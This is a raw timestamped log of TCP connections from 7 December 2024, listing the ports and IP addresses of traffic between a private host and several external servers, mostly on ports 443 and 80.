Dec 7, 2024 10:51:26.071712971 CET	49740	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:26.071722031 CET	443	49740	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:26.071733952 CET	49740	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:26.071821928 CET	49740	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:26.086396933 CET	443	49740	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:26.086417913 CET	443	49740	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:26.086455107 CET	49740	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:26.086462021 CET	443	49740	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:26.086498976 CET	49740	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:26.086508989 CET	49740	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:26.099330902 CET	443	49740	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:26.099351883 CET	443	49740	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:26.099411011 CET	49740	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:26.099420071 CET	443	49740	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:26.099455118 CET	49740	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:26.099487066 CET	49740	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:26.112477064 CET	443	49740	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:26.112495899 CET	443	49740	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:26.112540960 CET	49740	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:26.112549067 CET	443	49740	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:26.112579107 CET	49740	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:26.112596989 CET	49740	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:26.122333050 CET	443	49740	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:26.122356892 CET	443	49740	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:26.122442007 CET	49740	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:26.122451067 CET	443	49740	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:26.122493029 CET	49740	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:26.158930063 CET	443	49740	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:26.158947945 CET	443	49740	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:26.159040928 CET	49740	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:26.159054041 CET	443	49740	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:26.159104109 CET	49740	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:26.248667955 CET	443	49740	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:26.248691082 CET	443	49740	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:26.248780012 CET	49740	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:26.248789072 CET	443	49740	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:26.248832941 CET	49740	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:26.256908894 CET	443	49740	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:26.256926060 CET	443	49740	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:26.256983995 CET	49740	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:26.256990910 CET	443	49740	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:26.257036924 CET	49740	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:26.264384985 CET	443	49740	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:26.264404058 CET	443	49740	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:26.264487982 CET	49740	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:26.264494896 CET	443	49740	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:26.264544010 CET	49740	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:26.273212910 CET	443	49740	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:26.273235083 CET	443	49740	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:26.273305893 CET	49740	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:26.273312092 CET	443	49740	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:26.273363113 CET	49740	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:26.281229973 CET	443	49740	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:26.281250000 CET	443	49740	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:26.281296015 CET	49740	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:26.281302929 CET	443	49740	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:26.281349897 CET	49740	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:26.289876938 CET	443	49740	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:26.289896011 CET	443	49740	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:26.289964914 CET	49740	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:26.289972067 CET	443	49740	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:26.290013075 CET	49740	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:26.298568964 CET	443	49740	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:26.298592091 CET	443	49740	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:26.298682928 CET	49740	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:26.298691034 CET	443	49740	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:26.298732042 CET	49740	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:26.352684021 CET	443	49740	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:26.352704048 CET	443	49740	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:26.352799892 CET	49740	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:26.352812052 CET	443	49740	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:26.352871895 CET	49740	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:26.423270941 CET	443	49750	142.250.181.68	192.168.2.6
Dec 7, 2024 10:51:26.423608065 CET	49750	443	192.168.2.6	142.250.181.68
Dec 7, 2024 10:51:26.423634052 CET	443	49750	142.250.181.68	192.168.2.6
Dec 7, 2024 10:51:26.424624920 CET	443	49750	142.250.181.68	192.168.2.6
Dec 7, 2024 10:51:26.424694061 CET	49750	443	192.168.2.6	142.250.181.68
Dec 7, 2024 10:51:26.425082922 CET	49750	443	192.168.2.6	142.250.181.68
Dec 7, 2024 10:51:26.425143003 CET	443	49750	142.250.181.68	192.168.2.6
Dec 7, 2024 10:51:26.439551115 CET	443	49740	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:26.439569950 CET	443	49740	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:26.439656019 CET	49740	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:26.439666033 CET	443	49740	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:26.439713955 CET	49740	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:26.446403027 CET	443	49740	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:26.446424961 CET	443	49740	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:26.446485043 CET	49740	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:26.446494102 CET	443	49740	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:26.446523905 CET	49740	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:26.446548939 CET	49740	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:26.452560902 CET	443	49740	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:26.452577114 CET	443	49740	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:26.452640057 CET	49740	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:26.452646017 CET	443	49740	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:26.452682972 CET	49740	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:26.459547043 CET	443	49740	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:26.459568977 CET	443	49740	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:26.459630966 CET	49740	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:26.459640026 CET	443	49740	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:26.459660053 CET	49740	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:26.459683895 CET	49740	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:26.465368032 CET	49750	443	192.168.2.6	142.250.181.68
Dec 7, 2024 10:51:26.465384007 CET	443	49750	142.250.181.68	192.168.2.6
Dec 7, 2024 10:51:26.466031075 CET	443	49740	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:26.466047049 CET	443	49740	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:26.466099977 CET	49740	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:26.466108084 CET	443	49740	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:26.466135979 CET	49740	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:26.466156006 CET	49740	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:26.473196983 CET	443	49740	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:26.473212004 CET	443	49740	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:26.473283052 CET	49740	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:26.473290920 CET	443	49740	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:26.473334074 CET	49740	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:26.480015993 CET	443	49740	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:26.480036974 CET	443	49740	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:26.480077982 CET	49740	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:26.480084896 CET	443	49740	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:26.480144978 CET	49740	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:26.487543106 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:26.488125086 CET	49763	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:26.507328033 CET	49750	443	192.168.2.6	142.250.181.68
Dec 7, 2024 10:51:26.544706106 CET	443	49740	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:26.544728041 CET	443	49740	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:26.544796944 CET	49740	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:26.544806004 CET	443	49740	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:26.544845104 CET	49740	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:26.544861078 CET	49740	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:26.608263969 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:26.608738899 CET	80	49763	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:26.608820915 CET	49763	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:26.609050989 CET	49763	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:26.636899948 CET	443	49740	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:26.636923075 CET	443	49740	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:26.636981010 CET	49740	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:26.636993885 CET	443	49740	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:26.637044907 CET	49740	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:26.637810946 CET	443	49740	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:26.637854099 CET	443	49740	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:26.637877941 CET	49740	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:26.637885094 CET	443	49740	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:26.637907028 CET	443	49740	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:26.637922049 CET	49740	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:26.637953043 CET	49740	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:26.642421961 CET	49740	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:26.642436981 CET	443	49740	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:26.728715897 CET	80	49763	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:27.028765917 CET	443	49753	23.218.208.109	192.168.2.6
Dec 7, 2024 10:51:27.028858900 CET	49753	443	192.168.2.6	23.218.208.109
Dec 7, 2024 10:51:27.033473969 CET	49753	443	192.168.2.6	23.218.208.109
Dec 7, 2024 10:51:27.033482075 CET	443	49753	23.218.208.109	192.168.2.6
Dec 7, 2024 10:51:27.033796072 CET	443	49753	23.218.208.109	192.168.2.6
Dec 7, 2024 10:51:27.075606108 CET	49753	443	192.168.2.6	23.218.208.109
Dec 7, 2024 10:51:27.083736897 CET	49753	443	192.168.2.6	23.218.208.109
Dec 7, 2024 10:51:27.131328106 CET	443	49753	23.218.208.109	192.168.2.6
Dec 7, 2024 10:51:27.416013002 CET	49764	443	192.168.2.6	142.250.181.142
Dec 7, 2024 10:51:27.416060925 CET	443	49764	142.250.181.142	192.168.2.6
Dec 7, 2024 10:51:27.416146994 CET	49764	443	192.168.2.6	142.250.181.142
Dec 7, 2024 10:51:27.416416883 CET	49764	443	192.168.2.6	142.250.181.142
Dec 7, 2024 10:51:27.416433096 CET	443	49764	142.250.181.142	192.168.2.6
Dec 7, 2024 10:51:27.430815935 CET	49766	443	192.168.2.6	142.250.181.78
Dec 7, 2024 10:51:27.430845022 CET	443	49766	142.250.181.78	192.168.2.6
Dec 7, 2024 10:51:27.430938005 CET	443	49754	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:27.430954933 CET	49766	443	192.168.2.6	142.250.181.78
Dec 7, 2024 10:51:27.431149006 CET	49766	443	192.168.2.6	142.250.181.78
Dec 7, 2024 10:51:27.431164026 CET	443	49766	142.250.181.78	192.168.2.6
Dec 7, 2024 10:51:27.431958914 CET	49754	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:27.431967020 CET	443	49754	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:27.432357073 CET	443	49755	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:27.432439089 CET	443	49756	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:27.432539940 CET	49754	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:27.432543993 CET	443	49754	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:27.432787895 CET	49755	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:27.432817936 CET	443	49755	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:27.433144093 CET	49755	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:27.433147907 CET	443	49755	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:27.433336973 CET	49756	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:27.433361053 CET	443	49756	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:27.433675051 CET	49756	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:27.433680058 CET	443	49756	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:27.434269905 CET	443	49757	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:27.434834957 CET	49757	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:27.434848070 CET	443	49757	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:27.435499907 CET	49757	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:27.435507059 CET	443	49757	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:27.473903894 CET	443	49758	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:27.474307060 CET	49758	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:27.474317074 CET	443	49758	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:27.474808931 CET	49758	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:27.474812984 CET	443	49758	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:27.541380882 CET	443	49753	23.218.208.109	192.168.2.6
Dec 7, 2024 10:51:27.541448116 CET	443	49753	23.218.208.109	192.168.2.6
Dec 7, 2024 10:51:27.541524887 CET	49753	443	192.168.2.6	23.218.208.109
Dec 7, 2024 10:51:27.541749954 CET	49753	443	192.168.2.6	23.218.208.109
Dec 7, 2024 10:51:27.541749954 CET	49753	443	192.168.2.6	23.218.208.109
Dec 7, 2024 10:51:27.541764021 CET	443	49753	23.218.208.109	192.168.2.6
Dec 7, 2024 10:51:27.541774035 CET	443	49753	23.218.208.109	192.168.2.6
Dec 7, 2024 10:51:27.575126886 CET	443	49759	4.245.163.56	192.168.2.6
Dec 7, 2024 10:51:27.575222969 CET	49759	443	192.168.2.6	4.245.163.56
Dec 7, 2024 10:51:27.578156948 CET	49759	443	192.168.2.6	4.245.163.56
Dec 7, 2024 10:51:27.578167915 CET	443	49759	4.245.163.56	192.168.2.6
Dec 7, 2024 10:51:27.578382015 CET	443	49759	4.245.163.56	192.168.2.6
Dec 7, 2024 10:51:27.599426985 CET	49767	443	192.168.2.6	23.218.208.109
Dec 7, 2024 10:51:27.599463940 CET	443	49767	23.218.208.109	192.168.2.6
Dec 7, 2024 10:51:27.599606037 CET	49767	443	192.168.2.6	23.218.208.109
Dec 7, 2024 10:51:27.600572109 CET	49767	443	192.168.2.6	23.218.208.109
Dec 7, 2024 10:51:27.600584984 CET	443	49767	23.218.208.109	192.168.2.6
Dec 7, 2024 10:51:27.621366978 CET	49759	443	192.168.2.6	4.245.163.56
Dec 7, 2024 10:51:27.648158073 CET	49759	443	192.168.2.6	4.245.163.56
Dec 7, 2024 10:51:27.695328951 CET	443	49759	4.245.163.56	192.168.2.6
Dec 7, 2024 10:51:27.865403891 CET	443	49754	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:27.865462065 CET	443	49754	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:27.865622997 CET	49754	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:27.866348982 CET	49754	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:27.866362095 CET	443	49754	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:27.866373062 CET	49754	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:27.866379023 CET	443	49754	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:27.866938114 CET	443	49756	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:27.866997957 CET	443	49756	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:27.867074013 CET	49756	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:27.867249012 CET	443	49755	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:27.867307901 CET	443	49755	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:27.867364883 CET	49755	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:27.868480921 CET	49756	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:27.868496895 CET	443	49756	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:27.868509054 CET	49756	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:27.868515015 CET	443	49756	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:27.868643045 CET	443	49757	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:27.868699074 CET	443	49757	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:27.868810892 CET	49757	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:27.869653940 CET	49755	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:27.869672060 CET	443	49755	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:27.869683981 CET	49755	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:27.869689941 CET	443	49755	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:27.879703999 CET	49757	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:27.879723072 CET	443	49757	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:27.879733086 CET	49757	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:27.879739046 CET	443	49757	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:27.886209011 CET	49768	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:27.886231899 CET	443	49768	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:27.886291981 CET	49768	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:27.889027119 CET	49769	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:27.889056921 CET	443	49769	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:27.889338970 CET	49769	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:27.890482903 CET	49770	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:27.890492916 CET	443	49770	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:27.890598059 CET	49770	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:27.891072035 CET	49768	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:27.891084909 CET	443	49768	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:27.891393900 CET	49769	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:27.891408920 CET	443	49769	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:27.891484022 CET	49770	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:27.891499996 CET	443	49770	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:27.891952038 CET	49771	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:27.891964912 CET	443	49771	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:27.892045021 CET	49771	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:27.892154932 CET	49771	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:27.892167091 CET	443	49771	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:27.908258915 CET	443	49758	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:27.908325911 CET	443	49758	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:27.908508062 CET	49758	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:27.908544064 CET	49758	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:27.908555984 CET	443	49758	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:27.908566952 CET	49758	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:27.908576012 CET	443	49758	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:27.911284924 CET	49772	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:27.911308050 CET	443	49772	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:27.911539078 CET	49772	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:27.911737919 CET	49772	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:27.911748886 CET	443	49772	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:28.265633106 CET	443	49759	4.245.163.56	192.168.2.6
Dec 7, 2024 10:51:28.265657902 CET	443	49759	4.245.163.56	192.168.2.6
Dec 7, 2024 10:51:28.265666008 CET	443	49759	4.245.163.56	192.168.2.6
Dec 7, 2024 10:51:28.265675068 CET	443	49759	4.245.163.56	192.168.2.6
Dec 7, 2024 10:51:28.265697002 CET	443	49759	4.245.163.56	192.168.2.6
Dec 7, 2024 10:51:28.265713930 CET	49759	443	192.168.2.6	4.245.163.56
Dec 7, 2024 10:51:28.265724897 CET	443	49759	4.245.163.56	192.168.2.6
Dec 7, 2024 10:51:28.265760899 CET	49759	443	192.168.2.6	4.245.163.56
Dec 7, 2024 10:51:28.265791893 CET	49759	443	192.168.2.6	4.245.163.56
Dec 7, 2024 10:51:28.286390066 CET	443	49759	4.245.163.56	192.168.2.6
Dec 7, 2024 10:51:28.286463976 CET	443	49759	4.245.163.56	192.168.2.6
Dec 7, 2024 10:51:28.286475897 CET	49759	443	192.168.2.6	4.245.163.56
Dec 7, 2024 10:51:28.286514044 CET	49759	443	192.168.2.6	4.245.163.56
Dec 7, 2024 10:51:28.287448883 CET	49759	443	192.168.2.6	4.245.163.56
Dec 7, 2024 10:51:28.287468910 CET	443	49759	4.245.163.56	192.168.2.6
Dec 7, 2024 10:51:28.287484884 CET	49759	443	192.168.2.6	4.245.163.56
Dec 7, 2024 10:51:28.287492037 CET	443	49759	4.245.163.56	192.168.2.6
Dec 7, 2024 10:51:28.404850006 CET	49773	443	192.168.2.6	172.217.19.206
Dec 7, 2024 10:51:28.404896021 CET	443	49773	172.217.19.206	192.168.2.6
Dec 7, 2024 10:51:28.404958010 CET	49773	443	192.168.2.6	172.217.19.206
Dec 7, 2024 10:51:28.405340910 CET	49773	443	192.168.2.6	172.217.19.206
Dec 7, 2024 10:51:28.405355930 CET	443	49773	172.217.19.206	192.168.2.6
Dec 7, 2024 10:51:28.455404997 CET	80	49763	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:28.455468893 CET	49763	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:28.585100889 CET	49763	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:28.644342899 CET	49750	443	192.168.2.6	142.250.181.68
Dec 7, 2024 10:51:28.647542953 CET	49766	443	192.168.2.6	142.250.181.78
Dec 7, 2024 10:51:28.647712946 CET	49764	443	192.168.2.6	142.250.181.142
Dec 7, 2024 10:51:28.647809029 CET	49773	443	192.168.2.6	172.217.19.206
Dec 7, 2024 10:51:28.705096006 CET	80	49763	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:28.976349115 CET	443	49767	23.218.208.109	192.168.2.6
Dec 7, 2024 10:51:28.976468086 CET	49767	443	192.168.2.6	23.218.208.109
Dec 7, 2024 10:51:28.977997065 CET	49767	443	192.168.2.6	23.218.208.109
Dec 7, 2024 10:51:28.978012085 CET	443	49767	23.218.208.109	192.168.2.6
Dec 7, 2024 10:51:28.978260040 CET	443	49767	23.218.208.109	192.168.2.6
Dec 7, 2024 10:51:28.979906082 CET	49767	443	192.168.2.6	23.218.208.109
Dec 7, 2024 10:51:29.027337074 CET	443	49767	23.218.208.109	192.168.2.6
Dec 7, 2024 10:51:29.493236065 CET	443	49767	23.218.208.109	192.168.2.6
Dec 7, 2024 10:51:29.493324995 CET	443	49767	23.218.208.109	192.168.2.6
Dec 7, 2024 10:51:29.493674040 CET	49767	443	192.168.2.6	23.218.208.109
Dec 7, 2024 10:51:29.494255066 CET	49767	443	192.168.2.6	23.218.208.109
Dec 7, 2024 10:51:29.494255066 CET	49767	443	192.168.2.6	23.218.208.109
Dec 7, 2024 10:51:29.494277000 CET	443	49767	23.218.208.109	192.168.2.6
Dec 7, 2024 10:51:29.494287014 CET	443	49767	23.218.208.109	192.168.2.6
Dec 7, 2024 10:51:29.608505964 CET	443	49771	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:29.608530998 CET	443	49769	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:29.608675003 CET	443	49768	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:29.608911991 CET	443	49770	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:29.609164000 CET	49769	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:29.609164000 CET	49771	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:29.609181881 CET	443	49769	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:29.609198093 CET	443	49771	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:29.609616995 CET	49769	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:29.609622002 CET	443	49769	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:29.609864950 CET	49771	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:29.609865904 CET	49768	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:29.609869957 CET	443	49771	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:29.609885931 CET	443	49768	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:29.610101938 CET	49770	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:29.610109091 CET	443	49770	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:29.610240936 CET	49768	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:29.610244989 CET	443	49768	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:29.610584021 CET	49770	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:29.610588074 CET	443	49770	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:29.627373934 CET	443	49772	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:29.628108025 CET	49772	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:29.628108025 CET	49772	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:29.628138065 CET	443	49772	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:29.628153086 CET	443	49772	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:30.043114901 CET	443	49771	13.107.246.63	192.168.2.6
